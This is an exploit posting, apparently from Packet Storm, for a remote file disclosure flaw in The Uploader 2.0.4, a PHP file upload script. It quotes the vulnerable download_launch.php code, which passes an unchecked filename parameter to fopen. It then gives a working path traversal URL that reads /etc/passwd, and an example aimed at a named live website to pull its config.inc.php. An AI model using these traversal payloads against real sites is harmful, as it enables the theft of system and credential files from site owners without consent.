The Uploader version 2.0.4 suffers from a remote file disclosure vulnerability.
a06582d992b665eedad649893c5fba31959516d4f6addb115437d35cfd145583
=================================================
The Uploader 2.0.4 Remote File disclosure Vulnerability
=================================================
==============================================
# Script Name : The Uploader
# Version : [2.0.4]
# Language : php
# Author : Xa7m3d (H4K@hotmail.ch)
# Download : https://sourceforge.net/projects/theuploader
# Tested on : ubuntu 9.10
==============================================
File Disclosure :
in : api/download_launch.php
#######################################
$open=fopen($main['upload_directory'] . $_GET['filename'], "r"); <−−(+)
$size=filesize($main['upload_directory'] . $_GET['filename']);
$read=fread($open, $size);
header("Content-Type: application/octet-stream");
header("Content-Length: " . $size);
header("Content-Transfer-Encoding: binary");
header("Content-Disposition: attachment; filename=" . $_GET['filename']); <−−(+)
#######################################
3XP :
api/download_launch.php?filename=../../../../../etc/passwd
Example :
https://www.busut.it/theuploader/api/download_launch.php?filename=../config.inc.php
T3AM Piracy Unlimited Tunisia : # Cyb3R H3LL # k[i]ng # La Haft Xroy #
_________________________________________________________________
Votre messagerie et bien plus où que vous soyez. Passez à Windows Live Hotmail, c'est gratuit !
https://signup.live.com/signup.aspx?id=60969
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed